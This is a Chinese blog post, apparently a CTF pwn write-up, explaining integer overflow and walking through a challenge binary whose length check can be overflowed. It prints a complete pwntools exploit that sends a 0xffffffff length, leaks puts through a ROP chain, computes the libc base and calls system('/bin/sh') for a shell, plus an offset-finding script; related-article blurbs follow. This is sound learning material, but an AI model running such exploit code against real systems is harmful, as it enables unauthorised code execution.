简单的整数溢出

最新推荐文章于 2025-07-02 09:38:12 发布
原创 最新推荐文章于 2025-07-02 09:38:12 发布 · 2.9k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

首先说一下原理

为什么会出现整数溢出?

因为机器底层只能处理01串,也就是说底层本身是无法识别有符号数和无符号数的,这些规定是存在于编辑器层面,在C语言中,整数的基本类型有以下几种(图片来源:CTF Wiki

在这里插入图片描述

溢出又分上溢出和下溢出

上溢出:

当出现0x7fff+1,或者0xffff+1的时候,假设0x7fff是无符号数,那么+1之后就是0

下溢出:

例如0x0000-1 -> 0xffff

总的来说,利用技巧就是利用代码里有符号和无符号数之间的转换问题,恶意将某个关键数值改的超大或者很小

正式做题

这个题本身应该不难,但是这个代码看着太恶心了,没有完全理解清楚

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *v3; // rsp@1
  void *v4; // rsp@3
  int v6; // [sp+Ch] [bp-24h]@1
  void *dest; // [sp+10h] [bp-20h]@3
  int v8; // [sp+1Ch] [bp-14h]@3
  _DWORD *v9; // [sp+20h] [bp-10h]@1 4字节类型
  void *buf; // [sp+28h] [bp-8h]@1

  v6 = argc;
  init_stdio();
  puts("welcome.....");
  v3 = alloca(32LL);
  buf = (void *)(16 * (((unsigned __int64)&v6 + 3) >> 4));
  read(0, (void *)(16 * (((unsigned __int64)&v6 + 3) >> 4)), 0xCuLL);
  v9 = buf;
  if ( *(_DWORD *)buf != 1852402515 || v9[1] != 1 )
  {
    puts("some thing wrong");
  }
  else
  {
    v8 = v9[2] + 32;
    v4 = alloca(16 * (((unsigned __int64)(unsigned int)v8 + 30) / 0x10));// 整数溢出
    dest = (void *)(16 * (((unsigned __int64)&v6 + 3) >> 4));
    memcpy((void *)(16 * (((unsigned __int64)&v6 + 3) >> 4)), buf, 0xCuLL);
    read(0, (char *)dest + 12, v9[2]);          // 栈溢出
    handle_data();
  }
  return 0;
}

问题就出在else里面,v8是int型,但是这个地方却被作为无符号数处理,在机器里,底层是不会区分有符号数和无符号数,有符号和无符号是在编译层面才区分的,所以这个地方就可以进行一下整数溢出,修改能传入的数据大小限制,然后再利用栈溢出,获得shell

  else
  {
    v8 = v9[2] + 32;
    v4 = alloca(16 * (((unsigned __int64)(unsigned int)v8 + 30) / 0x10));// 整数溢出
    dest = (void *)(16 * (((unsigned __int64)&v6 + 3) >> 4));
    memcpy((void *)(16 * (((unsigned __int64)&v6 + 3) >> 4)), buf, 0xCuLL);
    read(0, (char *)dest + 12, v9[2]);          // 栈溢出
    handle_data();
  }

exp:

使用p32的是因为,最初输入的地方,是buf,buf和v9是一个类型,都是dword,所以要用p32

from pwn import *

# context.log_level = 'debug'

p = process('./pwn')
r = ROP('./pwn')
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

pop_rdi = r.find_gadget(['pop rdi','ret']).address

info("pop_rdi_ret: {}".format(hex(pop_rdi)))

p.recvuntil('welcome.....')

payload1 = p32(0x6e696b53)
payload1 += p32(0x1)
payload1 += p32(0xffffffff)
p.send(payload1)

# p.send('a'*200)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

payload2 = cyclic(124)
payload2 += p64(pop_rdi)
payload2 += p64(puts_got)
payload2 += p64(puts_plt)
payload2 += p64(elf.entry) 
p.send(payload2)

p.recvline()

puts_addr = u64(p.recv(6).ljust(8,'\x00'))
libc_base = puts_addr - libc.symbols['puts']
info("libc_base: {}".format(hex(libc_base)))

system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()

payload3 = p32(0x6e696b53)
payload3 += p32(0x1)
payload3 += p32(0xffffffff)
p.send(payload3)

payload4 = cyclic(124)
payload4 += p64(pop_rdi)
payload4 += p64(binsh_addr)
payload4 += p64(system_addr)
payload4 += p64(elf.entry)
p.send(payload4)

# gdb.attach(p)

p.interactive()

如果不知道cyclic(124)中的124是咋来的,继续往下看:

首先说明,attach后面那个send()里的字符串是使用pattern create生成的,执行下面这个脚本,然后按下’c’,即可正常寻找栈溢出偏移

from pwn import *

# context.log_level = 'debug'

p = process('./pwn')
r = ROP('./pwn')
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

pop_rdi = r.find_gadget(['pop rdi','ret']).address

info("pop_rdi_ret: {}".format(hex(pop_rdi)))

p.recvuntil('welcome.....')

payload1 = p32(0x6e696b53)
payload1 += p32(0x1)
payload1 += p32(0xffffffff)
p.send(payload1)

gdb.attach(p)
p.send('aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaa')

p.interactive()
智能合约中的整数溢出与下溢攻击(Overflow and Underflow)详解
2201_75798391的博客
01-13 717
这些漏洞通常出现在对整数进行数学运算时,合约没有正确地检查数值的边界,从而导致数值异常,甚至被攻击者利用进行恶意操作。例如,在执行资金转账之前,始终确保操作的数值是有效的,并且不会导致溢出或下溢。:当一个整数值超出了该类型能够表示的最大值时,超出部分会导致溢出,导致值回绕到该数据类型的最小值。:当一个整数值低于该类型能够表示的最小值时,超出部分会导致下溢,导致值回绕到该数据类型的最大值。通过这些防范措施,开发者可以提高合约的安全性,防止溢出与下溢攻击的发生。攻击者可以通过传递一个足够大的金额,让合约的。
pwn 整型溢出
清霂的博客
03-09 540
目录int_overflow 攻防世界r2t3 BUUoverflow int_overflow 攻防世界 file checksec ida32,进入login 输入一个用户名,再输入一个passwd,都无法直接栈溢出,进入check_passwd 发现v3是输入passwd的长度,v3是unsigned __int8类型范围是0~255 如果s的长度超过255,会变为(对s长度取模运算)得到的值。而s的长度不能大于0x199(409),取模后 v3>3&&v3<=
PWN-整数溢出
山高路远
04-06 1028
整数溢出 基础知识 数据类型以及所取的范围(环境为64位下使用gcc-5.4) 类型 字节 范围 short int 2byte(word) 0~32767(0~0x7fff) -32768~-1(0x8000~0xffff) unsigned short int 2byte(word) 0~65535(0~0xffff) int 4byte(dword) 0~2147483647(0~0x7fffffff) -2147483648~-1(0x80000000~0xfffffff
Pwn_整数溢出
m0_56897090的博客
08-18 284
调用者: 被调用函数: 条件:size=0 | i=0 为什么i <= (size-1)能通过呢? 原来是[[整数溢出]],(size-1)该变量的类型原先是无符号整数(unsigned int64) ↓ 当size=0,size=size-1=-1(0xffff),汇编对于无符号负数转换:下界溢出 -1转换为无符号数是4294967295 所以i<=(size-1) ...
Day 14:整数溢出(Integer Overflow/Underflow)
blog.boringhex.top
07-02 1494
本文详细讲解了C语言中整数溢出与下溢的问题。无符号整数溢出是明确定义的模运算行为,而有符号整数溢出属于未定义行为,可能引发严重错误。文章列举了五种典型陷阱案例,包括大数运算、数组长度计算等场景,并分析了其成因。针对这些问题,作者提出了边界检查、使用更大类型、编译器检测工具等防范措施。通过错误代码与优化代码的对比,展示了如何正确处理溢出问题。最后强调在C编程中必须重视整数运算的安全性,建议开发者在关键路径加入溢出判断,充分利用现代工具来提升代码健壮性。
整数溢出原理分析【转载】
weixin_30390075的博客
08-31 1181
课程简介 我们之前所研究的漏洞,都是非常经典的栈溢出漏洞,也是最为常见的漏洞形态。但是我们对于缓冲区溢出的学习,是不能够仅仅局限在这类的漏洞里面的,其实还有一些比较少见,但却值得我们注意的漏洞形式,是需要我们进行研究的。在接下来的几次课程中,就对这些漏洞逐一进行分析。而我这次所讲的,是整数溢出的漏洞。 课程介绍 实验环境: 操作机:Windows XP ...
PWN整数溢出
2302_81899310的博客
09-11 451
在C语言中,整数的基本数据类型分为短整型(short),整形(int),长整型(long),每一个数据类型分为有符号数和无符号数,每种数据类型都有各自的大小范围。(数据类型的大小范围是由编译器决定的,所以以下范围默认是64位下使用gcc-5.4)当程序中的数据超过其数据类型的范围,就会造成溢出整数类型的溢出被称为整数溢出
Pwn之整数溢出
Rinko233的博客
11-12 2200
Pwn中可能出现的整数溢出
整数溢出1
08-08
整数溢出是一种常见的编程错误,特别是在处理数值计算时,可能会导致不可预见的程序行为。在计算机科学中,整数的表示是有固定宽度的,这通常由编程语言或硬件架构决定。例如,32位整数可以表示从 -2^31 到 2^31-1 ...
c++判断整数翻转溢出_C++整数溢出
weixin_31021649的博客
02-06 1513
1、什么是整数溢出对于unsigned整型溢出,C的规范是有定义的——“溢出后的数会以2^(8*sizeof(type))作模运算”,也就是说,如果一个unsigned char(1字符,8bits)溢出了,会把溢出的值与256求模。例如:unsigned char x = 0xff;printf("%d\n", ++x);上面的代码会输出:0 (因为0xff + 1是256,与2^8求模后就是0...
基于整型变量一致化的整数溢出检测 (2008年)
04-25
### 基于整型变量一致化的整数溢出检测 #### 一、研究背景及意义 随着信息技术的发展,软件安全问题日益突出。其中,软件缺陷成为信息安全的主要隐患之一。整数溢出作为一类常见的软件缺陷,其可能导致程序逻辑...
PWN -整数溢出
m0_57836225的博客
11-19 764
在 PWN 从入门到精通的系列学习中,第 17 节着重探讨整数溢出这一重要概念。整数溢出是编程中可能出现的一种安全漏洞,在安全攻防领域,尤其是 PWN 相关技术研究中具有重要意义。
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
PWN–整数溢出
qq_74259765的博客
11-19 902
转自ctfwiki-整数溢出部分
pwn学习(整数溢出
至臻求学,胸怀云月
01-31 3397
整数溢出 ctf-wiki基础知识 请先浏览上述链接 类型 字节 范围 short int 2byte 0~0x7fff 0x8000~0xffff unsigned short int 2byte 0~0xffff int 4byte 0~0x7fffffff 0x80000000~0xffffffff unsigned int 4byte 0~0xffffffff ...
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 2674
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
pwn刷题num39----整数溢出
tbsqigongzi的博客
05-02 607
BUUCTF-PWN-bjdctf_2020_babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看一下主函数 char buf; // [rsp+0h] [rbp-10h] ..... ...... ...... ........ if ( (signed int
1.pwn的汇编基础(提及第一个溢出整数溢出
2301_80361487的博客
07-06 1763
RIP指针用于存储CPU下一条将会执行的指针,不能直接修改,正常情况下会每一次运行一条指令自增一条指令的长度,当发生跳转时才会以其他形式改变其值。深入底层后,计算机其实很笨,只能完成一些很基本的操作,但是速度很快机器码就是一个个01组成的,为了方便人类阅读,一般都以16进制呈现。高级语言经过编译之后,经过编译器处理,被打包成一个可执行文件的格式,RSP为栈顶指针,RBP为栈底指针,二者用于维护程序运行时的函数,在之后的调用约定一节会对其进行讲解。在当前主流的操作系统中,都是以字节(B)为寻址单位进行寻址,
整数溢出漏洞ctf
最新发布
07-05
### 整数溢出漏洞的利用方法 整数溢出漏洞通常发生在程序对整数进行算术运算时,导致结果超出数据类型的表示范围。这种漏洞在CTF竞赛中常被用来构造缓冲区溢出、内存破坏等攻击场景。具体利用方式包括: - **触发条件**:通过精心构造输入值,使得整数运算的结果发生溢出,从而改变程序的预期行为。例如,在分配内存时使用了不安全的整数运算,可能导致实际分配的内存大小小于预期,进而引发缓冲区溢出[^1]。 - **利用技巧**:利用整数溢出漏洞时,常见的策略是结合其他漏洞(如格式化字符串漏洞或堆喷射技术)来实现任意代码执行。例如,攻击者可能通过整数溢出绕过某些安全检查,然后利用堆喷射将恶意代码布置到内存中并执行。 ### CTF竞赛中的练习资源 为了更好地掌握整数溢出漏洞的利用技巧,参赛者可以通过以下资源进行练习: - **在线平台**:许多在线平台提供了丰富的CTF题目供练习,例如Pwnable.kr、Hack The Box以及CTFtime.org。这些平台上经常会有涉及整数溢出漏洞的题目,适合不同水平的学习者[^2]。 - **书籍推荐**: - 《Hacking: The Art of Exploitation》:这本书不仅介绍了基本的安全概念,还详细讲解了如何利用各种漏洞,包括整数溢出。 - 《Practical Reverse Engineering》:对于希望深入理解逆向工程和漏洞利用的人来说,这是一本非常好的参考书[^2]。 - **开源项目**:GitHub上有许多开源项目和教程,专门针对CTF竞赛中的各类漏洞利用技术进行了详细的演示和说明。搜索关键词“CTF integer overflow challenge”可以找到相关的示例和解决方案[^2]。 ### 示例代码 下面是一个简单的C语言示例,展示了如何检测整数溢出: ```c #include <stdio.h> #include <stdlib.h> int main() { int a = 2147483647; // Maximum value for a 32-bit signed integer int b = 1; int result; if (__builtin_add_overflow(a, b, &result)) { printf("Integer overflow detected!\n"); } else { printf("Result: %d\n", result); } return 0; } ``` 这段代码使用了GCC内置函数`__builtin_add_overflow`来检测两个整数相加是否会发生溢出。如果检测到溢出,则输出提示信息;否则,输出计算结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值